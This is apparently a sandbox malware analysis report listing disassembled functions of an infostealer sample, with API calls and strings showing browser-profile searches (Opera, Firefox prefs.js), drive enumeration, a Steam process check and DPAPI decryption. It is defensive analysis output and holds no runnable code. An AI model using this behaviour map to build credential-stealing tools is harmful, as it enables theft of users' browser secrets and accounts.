Instruction ID: 497a639e9f9bed764e2b609cea13bbac8422ccb0898e6bf0b5073c566259866f
Opcode Fuzzy Hash: 64224958b159b6d22f10ba55480620843db225054c2a355b86054d57ffa9fb44
Instruction Fuzzy Hash: 4F515FB190021C9BCF64DF60CC89AC9B7BDAB48305F1044E6E609E3250EB369B85CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: cb02eaf34686393eca99c01ebfa7c9f7bf3a8cb10dedbad8c0d8dba7fa238fbf
Instruction ID: 0260d5c266de210f65568f4b73986d2e2321fdcb1199aff99a3b39d86c03169e
Opcode Fuzzy Hash: cb02eaf34686393eca99c01ebfa7c9f7bf3a8cb10dedbad8c0d8dba7fa238fbf
Instruction Fuzzy Hash: F4021C71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3192DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

*%DRIVE_REMOVABLE%*, xrefs: 0041518F
*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_FIXED%, xrefs: 00415230
%DRIVE_REMOVABLE%, xrefs: 00415215

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c9d42909db418974abad73dc19fd428f4d65fc45d37dbb9aa4a689193fe46e70
Instruction ID: ea4f15970c6a5d4b45be7a2176528fb80d3ae30a0f48c86a9c416c7322ab13a3
Opcode Fuzzy Hash: c9d42909db418974abad73dc19fd428f4d65fc45d37dbb9aa4a689193fe46e70
Instruction Fuzzy Hash: 3C512CB190021CAFDF219FA1CC85BDA7BB9FB05304F1041AAEA49A7111EB355E89CF59

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: bfb07b7c417370cc65cdf3c113b30ca7fb62479600deee231d6f3beb901ab667
Instruction ID: 52904dbdec7a8812f0d6252b7ecd21146621a6019d038770ccdf13318407303e
Opcode Fuzzy Hash: bfb07b7c417370cc65cdf3c113b30ca7fb62479600deee231d6f3beb901ab667
Instruction Fuzzy Hash: D3A10C71D001289BCF60FB65DD46BCD7375AF04318F4141EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: 08d624d21809a606952038aba4fb6d1f5129b0991059f38e4937b8efa3199f49
Instruction ID: e9d49ef9ce8a2bc9a117d4fe253b15a3b51ee7ef692749dde95bb5dd1480248d
Opcode Fuzzy Hash: 08d624d21809a606952038aba4fb6d1f5129b0991059f38e4937b8efa3199f49
Instruction Fuzzy Hash: A0812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
Instruction ID: a3cdee16b5dfd04d3bd918c7eedd9f2c5ccf5c1b7225a83da59ac7103b0bc528
Opcode Fuzzy Hash: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
Instruction Fuzzy Hash: 81012170A01224DFDB60DB64DD45BDE77B9AF09311F4011E6E409E2290EB398B81CB25

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction ID: ba20de4f6d07cba688775156cda93bca6e715b227c052c7d3b8ee28496ea85f9
Opcode Fuzzy Hash: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction Fuzzy Hash: 2A314F71900328AFCB20EF65DD89BDEB3B8AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction ID: a342571249a904de89e2d28a6ac51ba89f12813f8da7ed82e50d95a069ae9259
Opcode Fuzzy Hash: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction Fuzzy Hash: C1018135600224AFEB61DB609D48FEE77FE9F19301F8400E6E40DE2251EA798B849B35

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction ID: cecb0f06a50482290116f099c25e0230255ed02a1d9bcffe7551c72d2d14305d
Opcode Fuzzy Hash: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction Fuzzy Hash: 9C117771A00214ABDB11EB65DC85BEE73A9AB48304F400097F905A3251DB78AEC48B64

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
RtlAllocateHeap.NTDLL(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

